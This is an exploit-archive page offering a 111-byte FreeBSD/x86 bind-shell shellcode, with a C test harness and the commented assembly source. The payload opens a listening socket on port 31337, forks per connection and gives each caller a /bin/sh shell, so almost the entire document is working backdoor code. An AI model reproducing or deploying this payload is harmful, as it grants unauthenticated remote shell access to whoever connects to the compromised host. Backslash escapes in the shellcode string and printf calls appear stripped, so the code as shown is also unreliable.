BSD x86 portbind + fork shellcode (111 bytes)

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : BSD x86 portbind + fork shellcode (111 bytes)
# Published : 2011-01-21
# Author :
# Previous Title : Allwin URLDownloadToFile + WinExec + ExitProcess Shellcode
# Next Title : win32/xp pro sp3 (EN) 32-bit - add new local administrator 113 bytes

/*
 -------------- FreeBSD/x86 - portbind shell + fork (111 bytes)--------------------
 *  AUTHOR : Tosh
 *   OS    : BSDx86 (Tested on FreeBSD 8.1)
 *   EMAIL : tosh@tuxfamily.org
 */



#include <stdio.h>
#include <string.h>
#include <arpa/inet.h>

char shellcode [] = "x31xc9xf7xe1x51x40x50x40x50x50xb0x61xcdx80x96x52x66"
                    "x68x05x39x66x68x01x02x89xe1x6ax10x51x56x50xb0x68xcd"
                    "x80x31xc0xb0x05x50x56x50xb0x6axcdx80x31xc0x50x50x56"
                    "x50xb0x1excdx80x97x31xc0x50xb0x02xcdx80x09xc0x74xea"
                    "x31xc9x31xc0x51x57x50xb0x5axcdx80xfexc1x80xf9x03x75"
                    "xf0x52x68x2fx2fx73x68x68x2fx62x69x6ex89xe3x52x53x89"
                    "xe1x52x51x53xb0x3bx50xcdx80";

void change_shellcode(unsigned short port)
{
   *((unsigned short*)(shellcode + 18)) = htons(port);
}
void print_shellcode(void)
{
   int i;
   for(i = 0; i < sizeof(shellcode) - 1; i++)
   {
      printf("\x%.2x", (unsigned char)shellcode[i]);
   }
   printf("n");
}
int main(void)
{
   unsigned short port = 31337;

   change_shellcode(port);
   print_shellcode();
   printf("Shellcode len = %d bytesn", sizeof(shellcode)-1);
   void (*f)() = (void*) shellcode;

   f();

   return 0;
}

/*
   section .text
      global _start

   _start:
      xor ecx, ecx
      mul ecx
      push ecx          
      inc eax
      push eax        
      inc eax
      push eax        
      push eax        
      mov al, 97        ; socket(AF_INET, SOCK_STREAM, 0)
      int 0x80
     
      xchg esi, eax    
     
      push edx          
      push word 0x3905  
      push word 0x0201
      mov ecx, esp    
     
      push byte 16      
      push ecx        
      push esi        
      push eax        
      mov al, 104       ; bind(sock, sockaddr*, sizeof(sockaddr))
      int 0x80
     
      xor eax, eax
      mov al, 5
      push eax
      push esi
      push eax
      mov al, 106       ; listen(sock, 5)
      int 0x80

   .ACCEPT:  
      xor eax, eax
      push eax
      push eax
      push esi
      push eax
      mov al, 30        ; accept(sock, 0, 0)
      int 0x80
     
      xchg edi, eax
     
      xor eax, eax
      push eax
      mov al, 2         ; fork()
      int 0x80
     
      or eax, eax      
      jz .ACCEPT
     
     
      xor ecx, ecx      ; dup2 STDERR, STDIN, STDOUT
   .L:
      xor eax, eax
      push ecx
      push edi
      push eax
      mov al, 90      
      int 0x80
      inc cl
      cmp cl, 3
      jne .L
     
      push edx        
      push '//sh'
      push '/bin'      
     
      mov ebx, esp      
      push edx          
      push ebx          
      mov ecx, esp      
      push edx          
      push ecx          
      push ebx          
      mov al, 59        ; execve("/bin//sh", ["/bin/sh", NULL], NULL)
      push eax          
      int 0x80
*/